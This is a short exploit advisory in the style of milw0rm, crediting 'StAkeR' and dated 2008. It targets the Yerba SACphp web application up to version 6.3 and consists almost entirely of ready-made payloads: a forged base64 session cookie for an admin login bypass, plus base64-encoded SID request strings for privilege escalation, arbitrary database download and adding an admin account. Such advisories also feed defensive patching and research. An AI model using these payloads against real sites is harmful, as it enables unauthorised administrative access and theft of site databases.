[*]~======================================================~[*] [*] Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities [*] [*]~======================================================~[*] [?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it [?] Discovered On 07/10/2008 [?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0 [?] Admin Login ByPass [?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw==" [?] Privilege Escalation [?] index.php?SID=[path (base64 encoded)] [?] Arbitrary Database Download [?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ== [?] Arbitrary Add Admin [?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ== # milw0rm.com [2008-10-07]